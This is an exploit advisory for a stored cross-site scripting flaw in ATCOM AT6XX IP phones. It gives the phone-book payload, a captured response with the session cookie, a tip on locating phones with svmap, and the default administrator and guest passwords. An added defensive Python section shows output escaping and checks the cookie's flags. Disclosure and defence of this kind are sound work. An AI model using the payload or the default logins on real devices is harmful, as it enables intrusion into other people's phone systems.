==================================
IP phone AT6XX Cross Site Scripting
==================================
=======================================================
# Exploit Title: [IP phone AT6XX Cross Site Scripting ]
# Date: 27/05/2012
# Author: cheki
# Vendor: http://www.atcom.cn/
# Version: AT6XX models
# Category:: webapps
# Tested on: linux
# Contact: [email protected]
======================================================
=====================================================
# Vulnerabilities #
Go to System Manage > Phone Book, choose Add Phone Book, and insert [Label==>Name && Label==>Namber]
"<script>alert("XSS");</script>" as the value, then click Add.
The script now executes whenever the phone book page is displayed, confirming the stored cross-site scripting.
HTTP/1.1 200 OK
Server: Rapid Logic/1.1
MIME-version: 1.0
Date: Thu Jan 1 10:21:44 1970 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: auth=6dea7758000091b8; path=/
# use: run svmap against a single IP or a range to locate the phones
| SIP Device | User Agent | Fingerprint |
--------------------------------------------------
| 192.169.0.3:5060 | unknown | disabled |
# demo: Remember the accounts are admin/admin for the administrator and guest/guest for the user.
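The following is an added illustration, not code from the advisory or from ATCOM: a minimal Python model of the defect described above (submitted phone-book fields written into the page unescaped) next to the escaped rendering that prevents it, plus a server-side input check and a small parser that reports which hardening attributes the Set-Cookie header in the captured response lacks. The sample payload and headers are constructed copies of the values shown in the advisory; the function names are hypothetical.

```python
import html
import re

# Constructed sample input: the payload from the advisory, as submitted in the
# "Name" field of the phone book form.
SAMPLE_NAME = '<script>alert("XSS");</script>'


def render_entry_vulnerable(name, number):
    """Mirrors the flaw described above: the submitted values are concatenated
    straight into the phone-book HTML, so any markup they contain is rendered."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (name, number)


def render_entry_fixed(name, number):
    """Hardened form: HTML-escape each value (including quotes) before it is
    placed in the page, so the browser shows the text instead of running it."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(name, quote=True),
        html.escape(number, quote=True),
    )


def contains_active_markup(value):
    """Defence in depth for the form handler: flag values that carry a tag,
    an inline event handler or a javascript: URL. A phone-book name or number
    never legitimately needs any of these."""
    pattern = r"<\s*/?\s*[a-zA-Z]|\bon\w+\s*=|javascript:"
    return re.search(pattern, value, re.IGNORECASE) is not None


# Constructed copy of the response headers shown in the advisory.
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Server: Rapid Logic/1.1
MIME-version: 1.0
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: auth=6dea7758000091b8; path=/"""


def missing_cookie_flags(raw_headers):
    """Return, per Set-Cookie header, the hardening attributes it does not set.
    A session cookie readable by script (no HttpOnly) is exactly what a stored
    XSS on the admin interface can steal."""
    findings = {}
    for line in raw_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        parts = [p.strip() for p in line.split(":", 1)[1].split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        findings[cookie_name] = [
            f for f in ("httponly", "secure", "samesite") if f not in attrs
        ]
    return findings


if __name__ == "__main__":
    print(render_entry_vulnerable(SAMPLE_NAME, "100"))
    print(render_entry_fixed(SAMPLE_NAME, "100"))
    print(contains_active_markup(SAMPLE_NAME))
    print(missing_cookie_flags(SAMPLE_HEADERS))
```

Output encoding (render_entry_fixed) is the fix that actually closes the hole; the input check is a second layer that also gives a log line to alert on when someone submits markup to the phone book. The cookie check shows why the captured response matters beyond the alert box: the auth cookie carries no HttpOnly, Secure or SameSite attribute.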
=====================================================
=====================================================
About ATCOM
ATCOM is the leading VoIP hardware manufacturer in the global market. We have kept innovating around customers' needs, working with partners to establish a total SMB VoIP solution of IP phones, IP PBXs and Asterisk cards.
With over 10 years' experience of R&D, manufacturing and service in the network and VoIP field, and a mission of creating the biggest value for IP terminals, we commit ourselves to supplying competitive IP phones and other terminals for IP PBX, softswitch, IMS and NGN providers and carriers, and to supplying a competitive total VoIP solution for the SMB market. We keep improving the customer's experience and creating bigger value with our reliable products. To date, our VoIP products have been sold to over 60 countries and are used by millions of end users.
For R&D, we keep investing capital and partner with the best technology companies all over the world. We hold our own software intellectual property rights and over 20 patents. We are devoted to providing better products and service for our customers, with the mission of becoming the best VoIP terminal manufacturer and the principle of innovative hard work.
=====================================================
[-] Greetz to 1337day.com Team hacking.ge Team and Anuka bolqvadze
# 0day.today [2018-02-20] #